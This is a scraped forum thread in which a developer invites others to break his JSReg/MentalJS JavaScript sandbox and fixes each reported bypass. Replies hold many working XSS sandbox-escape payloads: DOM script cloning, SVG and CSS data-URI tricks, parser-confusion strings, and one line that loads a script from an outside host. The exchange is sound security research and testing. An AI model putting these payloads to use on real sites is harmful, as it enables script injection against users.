JSReg sandbox challenge I posted this to the websec mailing list and I thought I'd post it here to see if anyone could beat it:- Over the last few months I've been developing and rewriting (a lot) JSReg but now hopefully I'm finally getting somewhere. The goal was to produce a sandboxed version of Javascript within Javascript itself because I need a sandbox for some projects I'm working on and I don't want the overhead of another language. My sandbox works with prefixes and suffixes so "x" becomes "$x$" and any reference to objects becomes $obj[$+'yourref'+$]. In addition I only allow certain functions/properties based on a whitelist (so stuff like constructor isn't supported). I also create safe functions which run some checks to prevent window leakage, for example take (1,[].sort)().alert(1) here we leak to window. I protect against this sort of attack by whitelisting native functions to disallow no or null arguments with the option to override per function (then an additional check is performed on the object). JSReg contains a special object called "globals", I use this to rewrite your javascript code so for example 'test' becomes globals.string('test') this produces a special prototyped version of the string which can be used later. Native functions are also supported this way by calling their name e.g. globals.alert(1) So how does the code look once it's been JSReg'd well here is a code sample:- function x(){ var m=1; this.getM=function(){ return m; } }; y=new x; y.getM() Which gets rewritten to:- function $x$(){ var $m$=globals.number(1);this.$getM$=function(){ return $m$; } };$y$=new $x$;$y$.$getM$() As you may have noticed I allow "this" to be used in this way but I will disallow assignment or return the value of "this", I may improve this in future once I'm certain that it is safe to use. At the moment I allow JSReg globals to be overwritten but I might prevent this at the regexp level or with setters and there are a few problems when not finishing a statement with a ";". Finally there's a limitation regarding the scope, at the moment the prefixes and suffixes are in the global scope so $x$ is actually window.$x$, I plan to get round this somehow so that $x$ is assigned to a object I'm still working that out. Any comments or suggestions are of course welcome but specifically I'm looking for hacks to window or glaring errors in my RegExps. If you can hack JSReg so that it returns window please let me know Once I'm confident that it is a secure sandbox, I shall release it as open source. You can have a go here:- http://sla.ckers.org/forum/read.php?2,29090,29090#msg-29090 Sun, 19 May 2013 21:06:09 -0500 Phorum 5.2.15a http://sla.ckers.org/forum/read.php?2,29090,51714#msg-51714 Re: JSReg sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51714#msg-51714 
document.body.innerHTML="<script> </script>";
x=document.getElementsByTagName('script')[2].cloneNode();
x.setAttribute('src', 'http://ha.ckers.org/xss.js');
document.body.insertBefore(x,document.body.firstChild);

bugs:

1) "There is no native insertAfter method." // [developer.mozilla.org]

2) 
if(!allowedTagsRegEx.test(elementNode.nodeName)) {                                        
 elementNode.parentNode.removeChild(elementNode);
 continue;  // it was unintentionally missed, I guess.
}

================
upd:

2)

f=document.createDocumentFragment();
f.appendChild(document.getElementsByTagName('script')[0].cloneNode());
f.firstChild.appendChild(document.createTextNode('1'));
f.firstChild.appendChild(document.createTextNode('/alert(location)/+0'));
document.body.appendChild(f);

// almost the same

x=document.createElement('div');
x.appendChild(document.getElementsByTagName('script')[0].cloneNode());
x.firstChild.appendChild(document.createTextNode('1'));
x.firstChild.appendChild(document.createTextNode('/alert(location)/+0'));
document.body.appendChild(x);

=================

createComment method is potentially dangerous when used in the context of uncontrolled innerHTML, but can not be used to MentalJS bypass now. 

<div id=x></div>

<script>
document.getElementById('x').appendChild(document.createComment("--><img src=xx:xx onerror=alert(1)//"));
alert(document.getElementById('x').innerHTML);
</script>
]]> LeverOne XSS Info Sat, 06 Apr 2013 09:31:38 -0500 http://sla.ckers.org/forum/read.php?2,29090,51713#msg-51713 Re: JSReg sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51713#msg-51713 Gareth Heyes XSS Info Fri, 29 Mar 2013 15:27:47 -0500 http://sla.ckers.org/forum/read.php?2,29090,51712#msg-51712 Re: JSReg sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51712#msg-51712 document.body.innerHTML="<form onmouseover=alert(location)><input name=attributes>"; // for the third time :)]]> LeverOne XSS Info Fri, 29 Mar 2013 10:00:47 -0500 http://sla.ckers.org/forum/read.php?2,29090,51711#msg-51711 Re: JSReg sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51711#msg-51711 
document.body.innerHTML='<script> </script>';
x=document.getElementsByTagName('script')[2].cloneNode();
document.body.appendChild.call(x,document.createTextNode('1'));
document.body.appendChild.call(x,document.createTextNode('/alert(location)/+0'));
document.body.appendChild(x);

I need to do the sandbox step just before the script is executed. Maybe checking the appendChild node type as it's being added to the document is better. Thanks as always!

Update...
The fix is to sandbox script as it's appended by creating a new node when appendChild is called. [code.google.com]]]> Gareth Heyes XSS Info Wed, 27 Mar 2013 03:45:20 -0500 http://sla.ckers.org/forum/read.php?2,29090,51710#msg-51710 Re: JSReg sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51710#msg-51710 

document.body.innerHTML='<script> </script>';
x=document.getElementsByTagName('script')[2].cloneNode();
x.appendChild(document.createTextNode('1'));
x.appendChild(document.createTextNode('/alert(location)/+0'));
document.body.appendChild(x);

bugs:

1) if(this.parentNode) { // parentNode may not exist f.e.: document.createElement('div').innerHTML='<script>1</script>'; <-- parentNode == null
script = document.createElement('script');

2) if(/^[$](?:toString|valueOf|constructor|hasOwnProperty)[$]$/.test(key))]]> LeverOne XSS Info Tue, 26 Mar 2013 13:50:37 -0500 http://sla.ckers.org/forum/read.php?2,29090,51706#msg-51706 Re: JSReg sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51706#msg-51706 Gareth Heyes XSS Info Fri, 22 Mar 2013 07:05:51 -0500 http://sla.ckers.org/forum/read.php?2,29090,51705#msg-51705 Re: JSReg sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51705#msg-51705 LeverOne XSS Info Fri, 22 Mar 2013 00:53:19 -0500 http://sla.ckers.org/forum/read.php?2,29090,51698#msg-51698 Re: JSReg sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51698#msg-51698 Function("/*", "*/){},alert(location),function(){")

I can now parse jQuery in 25-50ms :) I've fixed the dom hacks by basically stopping script being used in the dom. I guess I will have to write a whole dom filtering api to sandbox each text node if script etc. If anyone wants to help with that or knows of a better solution I'm all ears since my dom filtering coding isn't great.

Update...
I rewrote the dom side at the moment it allows css without filtering. I use node iterator instead now to parse the innerHTML assignments.

This demo might be more interesting to test since it's sort of a real world example of protecting the dom
http://www.modsecurity.org/demo/demo-deny-noescape.html?test=%3Cscript%3Ealert%28location%29%3C%2Fscript%3E]]> Gareth Heyes XSS Info Sun, 03 Mar 2013 17:20:44 -0600 http://sla.ckers.org/forum/read.php?2,29090,51595#msg-51595 Re: JSReg sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51595#msg-51595 
document.body.innerHTML="<form onmouseover=alert(location) name=body><input>";

2) FF 
x=document.createElement('script');
x.innerHTML='{alert(location)}';
x.appendChild(document.createTextNode('+1'));
document.body.appendChild(x);

3) !FF // SVGScriptElement 
document.body.innerHTML="<svg><script></script></svg>";
x=document.getElementsByTagName('script')[2].cloneNode();
x.textContent='alert(location)';
document.getElementsByTagName('svg')[0].appendChild(x);

4) $appendChild$ w/o context check 

x=document.createElement('script');
x.appendChild(document.createTextNode('1'));
x.appendChild(document.createTextNode('/alert(location)/+0'));
document.body.appendChild(x);
]]> LeverOne XSS Info Mon, 26 Nov 2012 05:07:38 -0600 http://sla.ckers.org/forum/read.php?2,29090,51594#msg-51594 Re: MentalJS sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51594#msg-51594 Gareth Heyes XSS Info Mon, 26 Nov 2012 03:27:58 -0600 http://sla.ckers.org/forum/read.php?2,29090,51585#msg-51585 Re: MentalJS sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51585#msg-51585 
document.body.innerHTML='<lo xmlns="><img src=x:xx onerror=alert(location)//"></lo>';

2) (repetition) 
document.body.innerHTML="<form onmouseover=alert(location)><input name=attributes>";

3) Opera 
document.body.innerHTML="<svg><image></image><style><!-- or any other elements -->image{filter:url('data:image/svg+xml,%3Csvg xmlns=%22http://www.w3.org/2000/svg%22%3E%3Cscript%3Ealert(top.location)%3C/script%3E%3C/svg%3E')}</style></svg>";


4) 
for(var lo=lo in lo,lo
/alert(location));'/)'//'

5) Opera 
document.body.innerHTML="<svg><image></image><style></style></svg>";
document.getElementsByTagName('style')[1].appendChild(document.createTextNode('image{filter:url(\'data:image/svg+xml,%3Csvg xmlns=%22http://www.w3.org/2000/svg%22%3E%3Cscript%3Ealert(top.location)%3C/script%3E%3C/svg%3E\')}'));

6) Opera 
document.body.innerHTML='<style></style>';
document.getElementsByTagName('style')[1].innerHTML='*{-o-link:"data:text/html;base64,PGJvZHk+CjxlbWJlZCAgRmxhc2hWYXJzPXVybD1odHRwOi8vYnVzaW5lc3NpbmZvLmNvLnVrJm5hbWU9X1ggc3JjPWh0dHA6Ly9odG1sNXNlY3VyaXR5Lmdvb2dsZWNvZGUuY29tL3N2bi90cnVuay9hdHRhY2htZW50cy90ZXN0LnN3Zj4KPGEgaWQ9X1kgaHJlZj0iamF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIHRhcmdldD1fWD48L2E+CjxzY3JpcHQ+c2V0VGltZW91dCgiZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ19ZJykuY2xpY2soKSIsIDQwMDApOzwvc2NyaXB0Pg==";-o-link-source:current}';

bugs:

1) 
element.setAttribute(attrs[j].name, attrs[j].name);

2) 

'$constructor$': {configurable: true, get:function(){return location}},

exploitable on IE9 
(1,location.constructor)('javascript:alert(document.URL)')
]]> LeverOne XSS Info Thu, 22 Nov 2012 00:33:18 -0600 http://sla.ckers.org/forum/read.php?2,29090,51582#msg-51582 Re: JSReg sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51582#msg-51582 Gareth Heyes XSS Info Tue, 20 Nov 2012 03:19:30 -0600 http://sla.ckers.org/forum/read.php?2,29090,51581#msg-51581 Re: JSReg sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51581#msg-51581 document.body.innerHTML="<svg><image></image><style></style></svg>"; document.getElementsByTagName('style')[1].textContent='image{filter:url(\'data:image/svg+xml,%3Csvg xmlns=%22http://www.w3.org/2000/svg%22%3E%3Cscript%3Ealert(top.location)%3C/script%3E%3C/svg%3E\')}';
A similar can be done via innerText + -o-link]]> LeverOne XSS Info Mon, 19 Nov 2012 20:53:17 -0600 http://sla.ckers.org/forum/read.php?2,29090,51580#msg-51580 Re: JSReg sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51580#msg-51580
Quote

for (j= element.attributes.length; --j>0;)
element.removeAttributeNode(element.attributes[ i]);
First bug is in the loop control. Should be either j-->0 or --j>=0.

Currently you don't check the first attribute:
document.body.innerHTML='<input onblur="alert(1)">'


The second bug is in the same piece of code. You made a mistake using i instead of j when removing attributes. Should be element.attributes[j] or elements.attributes[0], otherwise some really strange things happen:

document.body.innerHTML='<div><input onblur="alert(/chrome/)" b="" onblur="alert(/FF/IE/)">'

or worse:

document.body.innerHTML='<x><y><z a="" b="">']]> Jonas Magazinius XSS Info Mon, 19 Nov 2012 17:57:54 -0600 http://sla.ckers.org/forum/read.php?2,29090,51578#msg-51578 Re: MentalJS sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51578#msg-51578 Gareth Heyes XSS Info Fri, 16 Nov 2012 05:31:50 -0600 http://sla.ckers.org/forum/read.php?2,29090,51577#msg-51577 Re: MentalJS sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51577#msg-51577 document.body.innerHTML="<form onmouseover=alert(1)><input name=attributes>";
Opera 

document.body.innerHTML="<svg><image></image><style>image{filter:url('data:image/svg+xml,%3Csvg xmlns=%22http://www.w3.org/2000/svg%22%3E%3Cscript%3Ealert(top.location)%3C/script%3E%3C/svg%3E')}</style></svg>";


IE9 (element.attributes.length changes in the rewrite) 

document.body.innerHTML="<img style=l:o onerror=alert(location) src=>";
]]> LeverOne XSS Info Thu, 15 Nov 2012 20:22:00 -0600 http://sla.ckers.org/forum/read.php?2,29090,51571#msg-51571 Re: MentalJS sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51571#msg-51571 1. Spaces character check is invalid range
2. isVariablePart is accepting para/line separarators =)

Update..
Fixed. This was because I copied a regex of valid variables then did a conversion to ranges but either the regex was wrong or my conversion function went wrong. I've redone it using a manual check using eval in the browser to see if they are valid variables. Sorry about this, this was lame. I should have a unit test for variables but I could spend all day creating unit tests for lots of things =) and I don't have time.]]> Gareth Heyes XSS Info Wed, 14 Nov 2012 03:41:02 -0600 http://sla.ckers.org/forum/read.php?2,29090,51570#msg-51570 Re: MentalJS sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51570#msg-51570 eval("1..lo\u2028in\u2028function\u2028()/'/;alert(location)//'");
old problems...]]> LeverOne XSS Info Wed, 14 Nov 2012 00:21:42 -0600 http://sla.ckers.org/forum/read.php?2,29090,51569#msg-51569 Re: MentalJS sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51569#msg-51569
- Rewrote octals because who uses them anyway
- You made me add a function for asi. It's slower but needed to avoid the same mistakes in different places.
- Also fixed the number state machine to return an error with unexpected exponent if one was not included.]]> Gareth Heyes XSS Info Tue, 13 Nov 2012 03:20:59 -0600 http://sla.ckers.org/forum/read.php?2,29090,51568#msg-51568 Re: MentalJS sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51568#msg-51568
I agree and I have a very good first impression of the new parser. 

1<!--0[0];for(1
function lo(){}/alert(location)/+0<!--0[0];);

01.E+/-0;lo='/+alert(location)//'

07.in/alert(location)/+0
]]> LeverOne XSS Info Mon, 12 Nov 2012 16:39:35 -0600 http://sla.ckers.org/forum/read.php?2,29090,51566#msg-51566 Re: MentalJS sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51566#msg-51566
Also added a semi colon after return, break or continue:
[code.google.com]]]> Gareth Heyes XSS Info Mon, 12 Nov 2012 02:44:12 -0600 http://sla.ckers.org/forum/read.php?2,29090,51565#msg-51565 Re: MentalJS sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51565#msg-51565 for(;0;)break typeof/lo;alert(location)/+0
also continue + new, throw, delete, typeof]]> LeverOne XSS Info Sun, 11 Nov 2012 23:37:09 -0600 http://sla.ckers.org/forum/read.php?2,29090,51563#msg-51563 Re: MentalJS sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51563#msg-51563 Gareth Heyes XSS Info Sun, 11 Nov 2012 05:43:13 -0600 http://sla.ckers.org/forum/read.php?2,29090,51561#msg-51561 Re: MentalJS sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51561#msg-51561 1<!--0[0];for(var lo {}/alert(location,i=0)/i<!--lo;); ]]> LeverOne XSS Info Sat, 10 Nov 2012 17:03:01 -0600 http://sla.ckers.org/forum/read.php?2,29090,51541#msg-51541 Re: MentalJS sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51541#msg-51541
Update...
New version is up:
[www.businessinfo.co.uk]

Google code page:
[code.google.com]

You will notice the parsing is much faster now because I compare the charcodes directly and do a different method of parsing. I haven't got jQuery to work yet and ASI is still incomplete and I'm sure some missing syntax but I have my own validator now.]]> Gareth Heyes XSS Info Fri, 26 Oct 2012 03:01:38 -0500 http://sla.ckers.org/forum/read.php?2,29090,51535#msg-51535 Re: MentalJS sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51535#msg-51535 Fixed those.

You have a new toy as well, dom api.
b=document.createElement('b');b.appendChild(document.createTextNode('hello world!'));document.querySelector('form').appendChild(b);

Update...
and jQuery :O

1. Hit load jQuery
2. Hit execute
3. $ now contains a reference to a sandboxed jQuery!!]]> Gareth Heyes XSS Info Tue, 23 Oct 2012 05:33:34 -0500 http://sla.ckers.org/forum/read.php?2,29090,51534#msg-51534 Re: MentalJS sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51534#msg-51534 function lo(){i// in/1};alert(location)//1} // !Opera var y=function(){},lo // !FF /'/,alert(location)//' this function lo(){}/'/,alert(location)//' var NaN /'/,alert(location)//' // !FF
Tests: 
var i=i
/i/i,a

var x
(x)=123,x
/i/i

var i
{}
]]> LeverOne XSS Info Tue, 23 Oct 2012 02:59:22 -0500 http://sla.ckers.org/forum/read.php?2,29090,51533#msg-51533 Re: JSReg sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51533#msg-51533
Quote

:) In my opinion it's more fun, when "a lot of other parsers have problems".

XD]]> Gareth Heyes XSS Info Mon, 22 Oct 2012 08:42:29 -0500 http://sla.ckers.org/forum/read.php?2,29090,51532#msg-51532 Re: JSReg sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51532#msg-51532
Thanks, but I cann't agree, because I know I'll not be doing commits. Choose a license on your own, please.

// have you considered releasing a js parser test suite

:) In my opinion it's more fun, when "a lot of other parsers have problems".

// add me on gtalk

I don't use gtalk.]]> LeverOne XSS Info Mon, 22 Oct 2012 08:32:58 -0500 http://sla.ckers.org/forum/read.php?2,29090,51531#msg-51531 Re: JSReg sandbox challenge http://sla.ckers.org/forum/read.php?2,29090,51531#msg-51531
BTW your tests are amazing, have you considered releasing a js parser test suite? The edge cases are really really tricky to parse and a lot of other parsers have problems.

There is a new version uploaded now. I'll put it on google code when I get an answer about the license. Please add me on gtalk if you use it gazheyes [removemepleasethisis not needed at gmail dot com]]> Gareth Heyes XSS Info Mon, 22 Oct 2012 07:32:09 -0500